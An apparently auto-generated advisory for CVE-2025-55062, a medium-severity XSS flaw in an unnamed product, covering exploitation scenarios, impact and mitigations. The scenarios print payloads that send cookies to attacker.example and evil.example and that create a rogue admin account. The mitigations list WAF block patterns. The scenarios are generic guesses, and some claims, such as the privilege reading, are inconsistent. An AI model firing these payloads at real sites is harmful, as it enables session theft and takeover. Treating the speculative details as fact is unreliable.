CVE-2025-55062
Executive Summary
CVE-2025-55062 is a Medium-severity reflected or stored Cross-Site Scripting (XSS) vulnerability (CVSS 4.8) resulting from improper neutralization of user-supplied input during web page generation (CWE-79). The affected vendor, product, and version range are currently unconfirmed, meaning the flaw may exist across multiple web applications or a single unknown platform. An attacker exploiting this flaw can execute arbitrary JavaScript in the context of a victim's browser session, enabling session hijacking, credential theft, defacement, or lateral movement within an authenticated web application. No public exploit code, Nuclei template, or CISA KEV listing exists at the time of writing, and FIRST.org has not yet assigned an EPSS score.
This record — and 170,000+ others — are available via the ValtersIT API. One endpoint replaces five: NVD + GitHub CVE + CISA KEV + EPSS + Nuclei + Exploit-DB, unified.

Technical Analysis
The vulnerability class (CWE-79) indicates that the application reflects or stores attacker-controlled data without proper HTML/JavaScript encoding. Given the CVSS vector AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N, the attack requires:
- Network access (AV:N) — the vulnerable endpoint is reachable over the internet or an internal network.
- Low attack complexity (AC:L) — no special conditions, race windows, or exotic protocol manipulation required.
- High privileges (PR:H) — the attacker must be authenticated with a privileged account (e.g., admin, moderator, or user with the ability to submit data that gets rendered).
- User interaction (UI:R) — the victim must click a crafted link or view a crafted page (for reflected XSS) or visit an infected page (for stored XSS).
- Scope changed (S:C) — the XSS impacts a security context beyond the vulnerable component (e.g., it can access other applications or higher-privilege APIs).
- Low confidentiality and integrity impact — data theft or content modification is possible but not catastrophic.
The mechanics of exploitation depend on whether the flaw is reflected or stored:
Reflected XSS: The application embeds user input directly into an HTTP response without encoding. A crafted URL parameter (e.g.,
https://target/search.php?q=<script>...) is reflected in the resulting HTML. The attacker sends this link via phishing email or chat. When the victim clicks, the script executes in their session.Stored XSS: The application persists attacker-controlled input in a database (e.g., a comment field, profile bio, or configuration setting) and later renders it in pages viewed by other users. This is more severe as it requires no phishing step — any user visiting the affected page is compromised.
DOM-based XSS: If the vulnerability is client-side, the flaw resides in JavaScript that reads
location.hash,document.referrer, orpostMessagedata and writes it to the DOM viainnerHTMLordocument.writewithout sanitization.
Given the high-privilege prerequisite, this likely targets admin panels, configuration pages, or data-management interfaces where a lower-privileged user can inject content that an administrator later views (stored XSS) or where a privileged user is tricked into visiting a malicious link (reflected XSS).
Because the affected product is unknown, the specific endpoint, parameter names, and code-level details remain undisclosed. The attack surface, however, is any web form that accepts user input and renders it in a browser context without output encoding.
Exploitation Scenarios
Scenario 1 — Stored XSS via Data-Entry Interface (Authenticated Low-Privilege to Admin Compromise)
Reconnaissance: The attacker authenticates with a low-privilege account (e.g., a content contributor or support agent) and maps the application's input forms. They use a proxy (Burp Suite, OWASP ZAP) to enumerate parameters accepted by comment, feedback, or document-upload metadata fields.
Weaponization: The attacker submits a crafted payload in a field that is later rendered in an administrative dashboard. For instance, they enter the following into a "Title" or "Description" field:
<img src=x onerror="fetch('https://attacker.example/steal?cookie='+document.cookie)">Alternatively, a payload targeting a specific admin action:
<script> fetch('/api/admin/user/create', { method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify({username: 'attacker_admin', role: 'admin'}) }); </script>The payload is stored in the database without sanitization.
Delivery/Execution: When an administrator views the queue of pending items (e.g., reviewing user submissions), the payload executes in their browser with admin privileges. If the payload is self-contained (no external script load), it succeeds even under restrictive CSP, provided inline event handlers are allowed.
Post-Exploitation: The attacker obtains the admin session cookie, creates a persistent admin account, or exfiltrates sensitive data displayed on the dashboard. They can now pivot to other systems reachable from the admin session.
Scenario 2 — Reflected XSS via Crafted Link (Privileged User Phishing)
Reconnaissance: The attacker identifies a search, error, or redirect endpoint that reflects query parameters verbatim (e.g.,
https://target/admin/report?year=<script>...).Weaponization: The attacker crafts a URL with URL-encoded JavaScript, such as:
https://target/admin/report?year=2025%22%3E%3Cscript%3Efetch('https://evil.example/hook?data='%2BencodeURIComponent(document.cookie))%3C%2Fscript%3EDelivery: The attacker sends this link via a phishing email pretending to be a system notification ("Your annual report is ready — click to view"). Because the target requires admin privileges, the attacker specifically targets administrators or privileged users.
Execution/Post-Exploitation: The admin clicks the link while logged in. The script executes in the admin context, exfiltrating the session cookie or performing actions such as resetting passwords, modifying security settings, or extracting database credentials from environment variables rendered on the page.
Scenario 3 — DOM-Based XSS via Hash Fragment
Reconnaissance: The attacker discovers a JavaScript-heavy SPA that reads
location.hashto set page state. They test for sink functions likeinnerHTML,document.write, oreval.Weaponization: The attacker crafts:
https://target/app/#<img src=x onerror=alert(document.domain)>Delivery/Execution: The victim (a privileged user) clicks the link. The script executes without any server-side request, bypassing WAF and server logs. The attacker harvests tokens stored in
localStorageorsessionStorage.
Impact Assessment
Business Impact: The CVSS score of 4.8 (Medium) understates the potential damage due to the high-privilege requirement, but the scope change (S:C) means a successful attack crosses trust boundaries. If the vulnerable application is a management portal, SIEM, or ticketing system, an attacker can:
- Steal admin session tokens and impersonate administrators.
- Modify or delete data (integrity loss).
- Inject ransomware or credential-harvesting scripts into every subsequent page view by other authenticated users.
- Pivot to backend APIs that trust the web application's session.
Affected Systems: Unknown application(s) with web-facing components that render user input without output encoding. Likely candidates include custom enterprise CRMs, internal wikis, open-source CMS plugins, or aging in-house applications with minimal security review.
Blast Radius: Confined to the application and its connected data stores, but the stored-XSS variant can propagate to all users who view the infected page, effectively creating a worm-like propagation within the tenant. For internet-facing instances, this extends to external users and partners.
CVSS Subscore Analysis: The confidentiality (C:L) and integrity (I:L) subscores reflect that the attack is limited to what the victim's session can access — but in an admin session, that is often everything. The availability impact (A:N) is zero, meaning denial-of-service is not a concern.

Mitigation & Patch Guidance
Patch Confidence (2/4 — CLAIMED): A single, unverified source indicates a patched version exists for the affected product. However, because the vendor, product name, and specific fix version are not disclosed in the current CVE data, organizations cannot yet apply a targeted patch. Treat this as unconfirmed until vendor advisories are published.
Immediate Mitigations (no patch available yet):
- Input Validation: Deploy a WAF (ModSecurity, AWS WAF, Cloudflare) with OWASP CRS rules that block XSS payload patterns (
<script>,onerror=,javascript:, encoded variants) in query strings and POST bodies for all/admin/,/dashboard/,/manage/, and/settings/endpoints. - Output Encoding: If you maintain the source code of the affected application, perform a code audit for all occurrences of
echo, print, innerHTML,document.write, and template rendering that lackhtmlspecialchars()(PHP),escape()(Python), or equivalent context-aware encoding functions. - Content Security Policy (CSP): Implement a strict CSP header:
Content-Security-Policy: default-src 'none'; script-src 'nonce-{random}'; base-uri 'none'; frame-ancestors 'none';— this blocks inline scripts and event handlers even if injection occurs. - Session Hardening: Set
HttpOnlyandSecureflags on all session cookies, and implement__Host-prefix for client-side tokens. This prevents JavaScript-based cookie theft. - Access Restriction: If the vulnerable component is an admin interface, restrict access via VPN, IP allowlisting, or MFA enforcement to reduce the population that can be targeted via phishing (UI:R requirement).
Patch/Upgrade Path:
- Monitor the NVD entry and vendor-specific security feeds for an updated advisory that names the affected version range and fixed release.
- Once identified, apply the patch to all production, staging, and development instances within 48 hours if the fix is a minor release, or within 1 week for major upgrades.
- Use the correct package manager for the product's technology stack (e.g.,
composer updatefor PHP,pip install --upgradefor Python, gem updatefor Ruby) to retrieve the patched version.
Long-Term Hardening:
- Integrate automated SAST (Semgrep, Bandit, TSLint) and DAST (OWASP ZAP, Burp Suite Pro) scanning into the CI/CD pipeline to catch XSS in custom code before deployment.
- Enforce a secure-coding standard that mandates context-aware output encoding (e.g., OWASP Java Encoder, Microsoft AntiXSS) for all data rendered in HTML, JavaScript, CSS, or URL contexts.
- Maintain an asset inventory with associated version numbers so future CVEs can be triaged against known deployments.
- Implement a bug-bounty or vendor-coordination process to accelerate disclosure and patch verification for future vulnerabilities.
